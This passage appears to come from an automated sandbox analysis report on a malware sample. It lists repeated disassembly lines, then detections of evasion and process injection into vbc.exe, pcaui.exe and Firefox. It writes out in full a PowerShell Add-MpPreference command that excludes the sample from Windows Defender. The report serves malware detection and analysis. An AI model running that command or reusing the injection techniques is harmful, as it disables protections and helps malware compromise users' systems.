                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05930CB5 mov eax, dword ptr fs:[00000030h]6_2_05930CB5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FCCA0 mov ecx, dword ptr fs:[00000030h]6_2_058FCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FCCA0 mov eax, dword ptr fs:[00000030h]6_2_058FCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FCCA0 mov eax, dword ptr fs:[00000030h]6_2_058FCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058FCCA0 mov eax, dword ptr fs:[00000030h]6_2_058FCCA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A8CB1 mov eax, dword ptr fs:[00000030h]6_2_058A8CB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058A8CB1 mov eax, dword ptr fs:[00000030h]6_2_058A8CB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CCC8 mov eax, dword ptr fs:[00000030h]6_2_0587CCC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2CF0 mov eax, dword ptr fs:[00000030h]6_2_058B2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2CF0 mov eax, dword ptr fs:[00000030h]6_2_058B2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2CF0 mov eax, dword ptr fs:[00000030h]6_2_058B2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2CF0 mov eax, dword ptr fs:[00000030h]6_2_058B2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890C00 mov eax, dword ptr fs:[00000030h]6_2_05890C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890C00 mov eax, dword ptr fs:[00000030h]6_2_05890C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890C00 mov eax, dword ptr fs:[00000030h]6_2_05890C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05890C00 mov eax, dword ptr fs:[00000030h]6_2_05890C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCC00 mov eax, dword ptr fs:[00000030h]6_2_058BCC00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904C0F mov eax, dword ptr fs:[00000030h]6_2_05904C0F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov eax, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924C34 mov ecx, dword ptr fs:[00000030h]6_2_05924C34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587EC20 mov eax, dword ptr fs:[00000030h]6_2_0587EC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591CC20 mov eax, dword ptr fs:[00000030h]6_2_0591CC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591CC20 mov eax, dword ptr fs:[00000030h]6_2_0591CC20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B4C59 mov eax, dword ptr fs:[00000030h]6_2_058B4C59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886C50 mov eax, dword ptr fs:[00000030h]6_2_05886C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886C50 mov eax, dword ptr fs:[00000030h]6_2_05886C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886C50 mov eax, dword ptr fs:[00000030h]6_2_05886C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0588AC50 mov eax, dword ptr fs:[00000030h]6_2_0588AC50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCF80 mov eax, dword ptr fs:[00000030h]6_2_058BCF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2F98 mov eax, dword ptr fs:[00000030h]6_2_058B2F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2F98 mov eax, dword ptr fs:[00000030h]6_2_058B2F98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882FC8 mov eax, dword ptr fs:[00000030h]6_2_05882FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882FC8 mov eax, dword ptr fs:[00000030h]6_2_05882FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882FC8 mov eax, dword ptr fs:[00000030h]6_2_05882FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882FC8 mov eax, dword ptr fs:[00000030h]6_2_05882FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587EFD8 mov eax, dword ptr fs:[00000030h]6_2_0587EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587EFD8 mov eax, dword ptr fs:[00000030h]6_2_0587EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587EFD8 mov eax, dword ptr fs:[00000030h]6_2_0587EFD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05936FF7 mov eax, dword ptr fs:[00000030h]6_2_05936FF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589CFE0 mov eax, dword ptr fs:[00000030h]6_2_0589CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0589CFE0 mov eax, dword ptr fs:[00000030h]6_2_0589CFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954FE7 mov eax, dword ptr fs:[00000030h]6_2_05954FE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0FF6 mov eax, dword ptr fs:[00000030h]6_2_058C0FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0FF6 mov eax, dword ptr fs:[00000030h]6_2_058C0FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0FF6 mov eax, dword ptr fs:[00000030h]6_2_058C0FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C0FF6 mov eax, dword ptr fs:[00000030h]6_2_058C0FF6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05936F00 mov eax, dword ptr fs:[00000030h]6_2_05936F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCF1F mov eax, dword ptr fs:[00000030h]6_2_058BCF1F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05882F12 mov eax, dword ptr fs:[00000030h]6_2_05882F12
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AEF28 mov eax, dword ptr fs:[00000030h]6_2_058AEF28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05920F50 mov eax, dword ptr fs:[00000030h]6_2_05920F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05904F40 mov eax, dword ptr fs:[00000030h]6_2_05904F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05924F42 mov eax, dword ptr fs:[00000030h]6_2_05924F42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587CF50 mov eax, dword ptr fs:[00000030h]6_2_0587CF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058BCF50 mov eax, dword ptr fs:[00000030h]6_2_058BCF50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAF69 mov eax, dword ptr fs:[00000030h]6_2_058AAF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAF69 mov eax, dword ptr fs:[00000030h]6_2_058AAF69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922F60 mov eax, dword ptr fs:[00000030h]6_2_05922F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05922F60 mov eax, dword ptr fs:[00000030h]6_2_05922F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05954F68 mov eax, dword ptr fs:[00000030h]6_2_05954F68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2E9C mov eax, dword ptr fs:[00000030h]6_2_058B2E9C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B2E9C mov ecx, dword ptr fs:[00000030h]6_2_058B2E9C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0587AE90 mov eax, dword ptr fs:[00000030h]6_2_0587AE90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591AEB0 mov eax, dword ptr fs:[00000030h]6_2_0591AEB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0591AEB0 mov eax, dword ptr fs:[00000030h]6_2_0591AEB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0590CEA0 mov eax, dword ptr fs:[00000030h]6_2_0590CEA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05936ED0 mov ecx, dword ptr fs:[00000030h]6_2_05936ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05886EE0 mov eax, dword ptr fs:[00000030h]6_2_05886EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058B8EF5 mov eax, dword ptr fs:[00000030h]6_2_058B8EF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov ecx, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058AAE00 mov eax, dword ptr fs:[00000030h]6_2_058AAE00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\pcaui.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\pcaui.exeThread register set: target process: 5352Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\pcaui.exeThread APC queued: target process: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4EE9008Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
